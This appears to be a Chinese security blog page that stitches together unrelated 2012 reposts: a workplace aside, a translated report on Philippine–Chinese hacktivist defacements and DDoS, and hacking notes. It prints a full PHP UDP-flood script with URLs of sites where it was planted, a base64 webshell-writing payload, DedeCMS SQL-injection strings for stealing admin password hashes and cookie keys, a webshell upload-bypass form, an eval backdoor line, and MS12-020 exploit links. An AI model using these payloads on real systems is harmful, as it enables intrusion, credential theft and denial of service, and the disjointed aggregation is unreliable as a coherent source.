所以，打铁还得自身硬。万一有一天你也碰上了各种有趣的或者无聊的，或者稀奇古怪的老板，你若都能从他们身上学点东西，就没有白来走一趟。

中国人讨论工作搞不好的原因，一般有如下三个：1，像寡妇睡觉，上面没有人；2，像妓女睡觉，上面老是换人；3，像夫妻睡觉，老是自己人搞自己人。 对于大多数的人老说，中国人工作搞不好，主要是第三条，老是自己人搞自己人。各位搞IT的兄弟姐妹们，请从自我做起，不要带头搞办公室政治，不要起内讧， 大家一起来把工作搞好。往大里说，是响应的理想：为中华之崛起而工作；往小里说，工作是你衣食来源，好意思不努力点么？

小编注：本文翻译自国外的文章，请保持客观、理性的态度阅读！

多年来，在斯卡伯勒浅滩(菲)或者叫做黄岩岛(中)以及南沙岛，中国和菲律宾一直存在领土上的争端。由于之前中国在拒绝了菲律宾的关于搁置黄岩岛争议的提案后向南海派出了渔政船和军舰，所以当前最有争议的应该是黄岩岛了。

就在几天之后，黑客入侵了菲律宾大学的官方网站，留下一句话称他们来自中国并声明黄岩岛是中国的而不是菲律宾的。

黑客攻击事件的消息传播的很快。因为那些人自称来自中国，一个名为Busabos的黑客入侵并篡改了中国三个网站的首页：star.chinaumu.org, v.cyol.com and ploft.cn。他还将这些网站的黑页发到了Facebook一个名为Anonymous #OccupyPhilippines的主页中，这个主页有超过1000名的喜爱者和追随者。这次事件发生在2012年4月21日。

在他的黑页中说道：

STFU
Chinese government is clearly retarded //中国ZF明显是*障
Scarborough Shoal //黄岩岛
Anonymous #OccupyPhilippines
We are Anonymous, We are legion, We don’t forgive, We don’t forget //Anonymous组织的宣传标语
United as one Divided by zero, Expect us.

在他的黑页中还包括一个带着福克斯(Fawkes)面具的人，并在网页中嵌入了一首摇滚歌曲。根据他黑页中的内容，这个人看起来应该是Anonymous的支持者。

Busabos还在Facebook的Anonymous #OccupyPhilippines主页补充说他宁愿以这样的方式公开反对中国地下黑客在网络中的所作所为，也不想对当前他们所完成的入侵和篡改事件无动于衷。

也许你不知道busabos是谁，他就是2009-2010在菲律宾大选选举前的民意调查期间入侵菲律宾政府网站的人。事实上，在Zone-H里有他提交的很多网站入侵记录。

几分钟之后，一个名叫Supra Dick的人也在Facebook的这个主页中展示了他入侵的几个中国网站：

www.lanseyinxiang.com/phil.html
http://www.sanxinsudi.com/index.html
http://gh.rc.gov.cn
http://www.ryjzw.com

入侵者有时也挺有意思，因为他们有时会拼错菲律宾的英文(>.<||)
我对以上黑客事件的第一印象是，它们可以触发两个国家之间的网络战争。

与此同时，在Facebook上，就像下面的这幅图像，因为两国的领土争端也成为了议论的热点。

菲律宾报复行动发生一天之后，菲律宾共和国总统的官邸和工作地点theMalacañang宫，呼吁结束对中国的网络攻击，因为它可能使局势恶化和紧张。菲律宾外交部助理秘书长发言人劳尔·埃尔南德斯说：

“我们谴责这种网络攻击，不管他们来自哪一方，这些攻击行为是适得其反的，只会增加紧张局势，我们呼吁菲律宾和中国的网民更负责任一些，鼓励对话而不是进行不和谐的行为。”

然而，他的声明是没有用的，因为他们无法控制网络攻击背后那些人的思想，并且这个国家没有能够在此情况下采取行动的网络安全，取证和信息安全机构。事实上，国家调查局反欺诈及计算机犯罪部在网络取证方面已经被证明是无用的，没有良好的技术进行取证。这些结论是基于之前我对Busabos的采访，有人泄露了一段他与NBI(国家反欺诈及计算机犯罪调查部)的对话记录。菲律宾政府也希望建立一个机构能应对和处理这种窘境。

但不管怎样，从Hernandez的声明中找到了一个关键点：中国因为其资助网络间谍活动而著名，而且菲律宾的地下组织也在增长。因此很可能摩擦出网络战争的火花。他只是想叫停那些人，但我们也不能因此而责备他。

最后，2012年4月23日，总统发言人埃德温·Lacierda发出一份正式声明中说：

“大约在2012年4月23日下午，总统通信发展和战略规划办公室（PCDSPO）注意到一些拥有伪造的user-agents的恶意URL请求从国家政府官方网站（网址：www.gov.ph），到PCDSPO网站（网址：www.pcdspo.gov.ph），又到总统博物馆和图书馆网站（网址：www.malacanang.gov.ph），导致我们的服务器立刻相应延迟。我们确定，这是一次拒绝服务攻击。通过我们的数据分析收集的信息表明，网络攻击的IP地址来自中国。”

PCDSPO正试图保持网站的正常运营。但是请注意持续进行的攻击使我们只能暂时避免宕机。

这确实是一次来自中国的DDOS攻击，或者只是服务器在中国而真正的攻击者并不是中国？难道他们想伪造出可以追溯到中国的网络攻击？官方目前也没有任何反应，可能是因为保密原因。

我也不能确定这次攻击是否真的来自中国，因为没有足够的证据。况且谁愿意因为拥有本国的IP地址而被追踪。但这只是我的想法。如果中国真的想发动网络攻击他们应该会使用不同的网络，发起一系列的DoS攻击或者是DDoS。

当消息再次传开后，菲律宾的另一个地下组织，Privatex，决定加入Anonymous #OccupyPhilippines组，他们发起了第二次报复。这一次他们称他们的行动为#OpChinaDown。

下面是一些确认被黑的网站：

http://www.ocex.com.cn
http://www.teawindow.com
http://www.higvod.cn
http://www.lzrk.gov.cn
http://lppm.bigc.edu.cn/Pr1vX.htm
http://xxb.leiyang.gov.cn/Pr1vX.htm
http://en.founder.com.cn
http://dxswl.cn
http://www.cord.cn
http://fmprc.gov.cn (DDos or DoS Attack)
http://www.3322.net.cn
http://wahsangtech.com/index.aspx

#OpChinaDown

最近发生在中国网站上的入侵事件只是针对有同样遭遇的菲律宾网站的简单回应。你可以继续欺负我们国家的海域，但我们绝对不会容忍你恐吓我们自己国家的网络服务。

这些入侵只是针对你们最开始行为的回应。我们并不是要开始什么，只是想告诉你，我们不希望在我们自己的网络中被过分欺负。

#OpChinaDown不是一种威胁。这将是一个答复，针对以后来自中国网络攻击的一个答复。我们把国家的争端留在政府手中，但这并不意味着我们不会支持他们。

Scarborough Shoal is ours.
We are Anonymous
We are Legion
We do not Forgive
We do not Forget
United as One
Divided by Zero
Expect Us

@AnonPinas

除了对中国网站的入侵，两组的支持者也发动了对中国政府网站的DDoS攻击和DoS攻击。事实上，来自Anonymous #OccupyPhilippines的Seethered向他获得权限的15个网站上上传了15份PHP UDPFlood后门，下面这些网站是他上传了UDPFlood 后门的网站：

http://spaneconi.com.mx/upd.php
http://haventheatre.org/upd.php
http://ainamedia.com/upd.php
http://210.127.51.207/upd.php
http://www.courseoutsource.com/upd.php
http://www.tagsystems.org/upd.php
http://cyberretailer.biz/upd.php
http://www.thebirchproductions.com/upd.php
http://minstermemorialsltd.co.uk/upd.php
http://202.200.82.44/webdav/shell.php
http://217.6.136.144/webdav/greenshell.php
http://www.tingsbling.co.uk/upd.php
http://ipswichinflatables.co.uk/upd.php
http://inspireyogabrisbane.com.au/wp-content/themes/striking/cache/images/udp.php
http://www.cutbackprod.com/wp-content/themes/aperture/cache/adik.php

根据我的分析，seethered上传的PHP UDPFlood，最初是由Hexbooter编码的。我偶然从网站上下载到了一份，我清理了其他后门。这里是一个恶意PHP代码的例子：

<?php//UDPif(isset($_GET['host'])&&isset($_GET['time'])){$packets = 0;ignore_user_abort(TRUE);set_time_limit(0);$exec_time = $_GET['time'];$time = time();//print "Started: ".time('d-m-y h:i:s')."";$max_time = $time+$exec_time;$host = $_GET['host'];for($i=0;$i<65000;$i++){$out .= 'X';}while(1){$packets++;if(time() > $max_time){break;}$rand = rand(1,65000);$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);if($fp){fwrite($fp, $out);fclose($fp);}}echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";echo '<br><br><form action="'.$surl.'" method=GET><input type="hidden" name="act" value="phptools">IP: <br><input type=text name=host><br>Length (seconds): <br><input type=text name=time><br><input type="submit" value="Go" /><!--<span class="hiddenSpellError" pre=""-->form>';}else{ echo '<br><b>UDP Flood</b><br><form action=? method=GET><input type="hidden" name="act" value="phptools">IP: <br><input type=text name=host value=><br>Length (seconds): <br><input type=text name=time value=><br><br><input type=submit value=Go></form>';}?>

根据代码，它每秒发送65000数据包，并允许攻击者输入攻击的长度。

“他们想进行分布式拒绝服务，那我们就给他DDoS”Anonymous #OccupyPhilippines Facebook的管理员之一在主页说到。

像预言的那样，一些中国黑客，一位自称是Silic黑客组织的成员，成功渗透了菲律宾政府官方网站和部分预算管理网站。他留下一些话说：

“Hacked! Owned by Chinese Hackers!”

“How come a small bitch border country are overconfident? And challenged to our Chinese super hacker?”

“Remeber: Don’t Trouble Chinese, Don’t Play with Fire. All Members from Silic Group Hacker Army F*ck your mother and all your F8cking families”

他们还在主页挂了一面中国国旗。

现在，这些行为都使网络中的紧张局势升级。菲律宾或Pinoys和中国之间的网络战争虽然不像真正的战争那样致命。但如果这种行为不停止，可能也会危及到一些银行，电信，网上业务和其他电子商务网站。

文/Jay Turla 译/[FreeBuf]Pnig0s

参考文献：

https://www.facebook.com/pages/Anonymous-OccupyPhilippines/224402790971504

http://globalnation.inquirer.net/34021/china-deploys-gunboat

http://www.gov.ph/2012/04/23/statement-of-the-presidential-spokesperson-on-the-denial-of-service-attack-on-pcdspo-maintained-websites-april-23-2012/

http://www.interaksyon.com/infotech/budget-office-website-defaced-by-suspected-chinese-hackers

补充阅读：

http://en.wikipedia.org/wiki/Scarborough_Shoal

链接：http://www.wooyun.org/bugs/wooyun-2012-06420

利用方法1.注册任意账户
2.登陆用户，发表blog日志（注意是日志）
3.添加图片，选择网络图片，地址

{${fputs(fopen(base64_decode(ZGVtby5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4.访问日志，论坛根目录下生成demo.php，一句发密码C

不知道是否可行。未验证。

　　百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”，获得使用DeDeCMS系统的网站。

　　注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，

　　然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。

　　然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

　　/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码

　　得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5

　　上传漏洞。要求网站开启新会员注册功能，首先注册新会员，无需通过邮件验证，

　　只要登陆会员中心，然后访问页面链接

　　“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

　　如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

　　于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm

<form action="=../dialog/select_soft_post]

<[/url">http://www.si1ence.cn/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>

 

 把url改成目标url就行了。还有个全局变量提交，绕过注册的可以去黑防2月刊上面看。

安奈特（Allied Telesis）是知名的网络产品和解决方案供应商，自1999年5月成立了安奈特（中国）网络有限公司进入国内后。产品广泛应用于电信、保险、房地产、教育、公安、武警、军队、水利、政府等诸多领域。在此事发生之前很多企业对安奈特的产品和售后服务都赞赏有加。

但此次安奈特公司被发现留有后门，对中国的网络安全造成了极大的威胁，很多国企央企和保密企事业单位受到的影响尤为严重。此事件，给安奈特企业本身带来的影响也是不可估量的。对于网络来讲最重要的就是安全，安奈特作为网络设备提供商，严重触碰了自己行业红线。据悉很多单位已收到相关单位发布的红头文件，要求立即停止使用和禁止未来再次购买安奈特公司产品。

在安奈特公司产品有后门事件发生后，太平洋电脑网的编辑第一时间联系了安奈特的市场部，对此事进行确认和了解。得到的官方答复是：“正在就此事件与有关部门协商中”。我们也会继续关注此事，进行跟踪报道，并将第一时间获取的信息告知网友。（来自PCONLINE）

上文来自太平洋电脑网，游侠专门搜索了下，发现了下面两篇文章：

发改局关于网络设备使用情况的清理工作自查报告  http://www.deyang.gov.cn/dyweb/xxgk/PublicView.asp?newsid=484395

德阳市发改局

从政府网站上看到如此信息，应该不是空穴来风。

不过游侠在中央政府采购网上发现，安奈特依然在列，不过旗下无任何产品。

elseif($action == 'post')
{
if(empty($membergroup)){
echo "您还没有设置分组！";
exit;
}
$sql = "UPDATE ` SET `groupid`='{$membergroup}' WHERE `fid`='{$mid}' AND `mid`='{$cfg_ml->M_ID}';";
$dsql->ExecuteNoneQuery($sql);
$row = $dsql->GetOne("SELECT groupname FROM WHERE mid = {$cfg_ml->M_ID} AND id={$membergroup}"); //数字型注入
echo "&nbsp;".$row['groupname']."&nbsp;&nbsp;<a href='#' onclick='EditMemberGroup($mid);return false;'>修改</a>";

很明显当“action=post”时，$membergroup导致数字型注入漏洞，但是DeDeCMS在访问MySql数据库之前，使用CheckSql()自定义函数对SQL语句进行安全检查，无法直接注入。
绕过防注入。CheckSql()函数定义在/include/dedesql.class.php或/include/dedesqli.class.php数据库类文件中，代码如下：

if (!function_exists('CheckSql'))
{ function CheckSql($db_string,$querytype='select')
{global $cfg_cookie_encode;
$clean = '';$error='';$old_pos = 0;$pos = -1;
...(略)
//如果是普通查询语句，直接过滤一些特殊语法
if($querytype=='select')
{$notallow1= "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}";
//[^0-9a-z@\._-]{1,}即至少1个非数字、小写字母、@等字符，
if(preg_match("/".$notallow1."/", $db_string))
{//①preg_match未使用参数i，使用大写绕过，如：Union
puts(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||SelectBreak\r\n");
exit("<font size='5' color='red'>Safe Alert: Request Error step 1 !</font>");
}
}
while (TRUE)
{ $pos = strpos($db_string, '\'', $pos + 1);
if ($pos === FALSE)
{break; }
//②假如字符串$db_string中不存在“\'”退出while循环，存在则继续向下执行
$clean .= substr($db_string, $old_pos, $pos - $old_pos);
while (TRUE)
{ ...(略) }
$clean .= '$s$';
//③将字符串$db_string中"\'"和"\'"之间的字符转为"$s$"，即信任之间的字符串，绕过防注入的关键
$old_pos = $pos + 1;
}
…..(继续接如下代码)
}
}
$clean .= substr($db_string, $old_pos);
$clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));
//④"\s"匹配任何空白字符，包括空格、制表符、换页符等，$clean转为小写
//⑤再次检查union关键字
if (strpos($clean, 'union') !== FALSE && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)
{
$fail = TRUE;
$error="union detect";
}

//⑥依次检查--、#、benchmark、load_file、outfile、select等关键字
elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== FALSE || strpos($clean, '#') !== FALSE)
{...(略) }
//这些函数不会被使用，但是黑客会用它来操作文件，down掉数据库
elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0)
...(略)
//老版本的MYSQL不支持子查询，我们的程序里可能也用得少，但是黑客可以使用它来查询数据库敏感信息
elseif (preg_match('~\([^)]*?select~s', $clean) != 0)
{...(略)}
if (!empty($fail))
{//存在限制的Sql关键字，写日志文件$log_file，输出“Safe Alert: Request Error step 2!”
fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||$error\r\n");
exit("<font size='5' color='red'>Safe Alert: Request Error step 2!</font>");
}
else
{//⑦不存在限制的Sql关键字，返回$db_string字符串
return $db_string;
}

语句①使用正则表达式过滤Sql关键字，但是因为没有参数“i”，导致可以使用大写绕过，比如“Union”等，While循环实现将字符串（Sql语句）中转义单引号之间的字符转为“$s$”，不予检查，此举意图是信任转义单引号之间的字符，即允许提交包含Sql关键字的文字，比如发表新文章的内容，但是也因此产生了安全漏洞。
漏洞利用。构造membergroup变量值为` Union select pwd from ` where 1 or `”，注意：1）“Union”不能全为小写“union”，2）前后使用`”。当变量提交后，Sql语句成为“SELECT groupname FROM WHERE mid = 8 AND ` Union select pwd from ` where 1 or `”，mid为当前用户id，首先大写Union绕过防注入语句①，然后防注入会将“\'”之间的字符串认为可信任的，对于其中的字符串不再做防注入过滤，尽管其中含有“union、select”等关键字！在CheckSql()函数中添加输出语句如下，可以直观地看到转换前后的Sql语句以及注入结果如图1。…(略)
echo "原字符串：".$db_string."<br>";
//完整的SQL检查
while (TRUE)
{
…(略)
}
$clean .= substr($db_string, $old_pos);
$clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));
echo "转换以后：".$clean."<br>";
…(略

这里注出的是substr(md5($this->userPwd), 5, 20)值，我们可以去掉前三位和最后一位，成为16位MD5码，如“7a57a5a743894a0e”，再进行爆破。常用的注入链接如下：

注入管理员密码：
` Union select pwd from ` where 1 or `
//如果存在多个管理员时，可以将where条件改为“id=1 or `”或“userid=0x61646D696E or `”
注入$cfg_cookie_encode
` Union select value from ` where aid=3 or `
//在获得$cfg_cookie_encode后，我们可以直接利用漏洞二。另外在“/data/'.md5($cfg_cookie_encode).'_safe.txt'”文件中记录着注入痕迹。

漏洞修补
目前官方没有升级包，简单的防止注入修补方法可以将ajax_membergroup.php页面删除，或者给CheckSql()自定义函数中的preg_match函数增加“i”参数，防止上传的方法可以过滤“/include/dialog/select_soft_post.php”文件中的变量$newname，限制其以字符“.”、“?”以及空格等字符结束等。

转自泪少

转自互联网

systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

来自lcx

两个版本都有此漏洞

只需要输入账号  密码不需要输入

利用代码如下：‘localhost’@'@”

健忘，记下来。完全标题党

author：舞林  cnsec.org

shopcar.class.php被植入一句话

简要描述：DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门

前几日下载并不存在此代码

shopcar.class.php被植入一句话

@eval(file_get_contents('php://input'));

详细说明：shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

漏洞证明：shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

修复方案：删除@eval(file_get_contents('php://input'));

已用exp亲测受影响系统版本有：
2003 中文企业版SP2
2003 SP1 也受此影响，但官方出的补丁基于SP2，需要先升级SP2才可运行此补丁。

请用迅雷下载

2003 SP2 补丁包
http://download.microsoft.com/download/5/9/7/5976b101-a6bd-41c8-b39f-bb8e39ff1444/WindowsServer2003-KB914961-SP2-x86-CHS.exe

2003 3389溢出补丁 KB2621440
http://download.microsoft.com/download/3/C/F/3CF10043-CB94-476A-A677-F6FA103CD42D/WindowsServer2003-KB2621440-x86-CHS.exe

其他系统版本补丁
http://www.microsoft.com/downloads/zh-cn/results.aspx?freetext=KB2621440

有批处理版的、py 版的，这又是一个版本的，以下内容转载于互联网，真实性未测，请自行判断！

貌似是个假的，目测就是那个 ms12-20 py，目测和2008年一漏洞的代码极其相似：

http://www.1337day.com/exploits/9303

需要安装 FREERDP

这个貌似就是大家苦苦寻找的 ms12-20.exp

下载地址：http://115.com/file/anmgwyzh

视频地址：http://good.gd/1975261.htm

FREERDP 模块：https://github.com/FreeRDP/FreeRDP/downloads

转载于Dis9

直接是蓝屏，伤不起啊，ms12-20疯狂了。就当娱乐吧，哈哈。

根据大家的测试，多数为直接蓝屏，蓝屏的出现基本可以确定是因为MS11-065补丁的原因。

PoC是根据2011年8月出现的MS11-065补丁以后的rdpwd.sys文件结构而写

微软通过MS11-065修改了rdpwd.sys文件并更新了版本，所以导致没打过MS11-065的机器就出现了蓝屏等症状。

systeminfo 

systeminfo|find /i "KB2621440"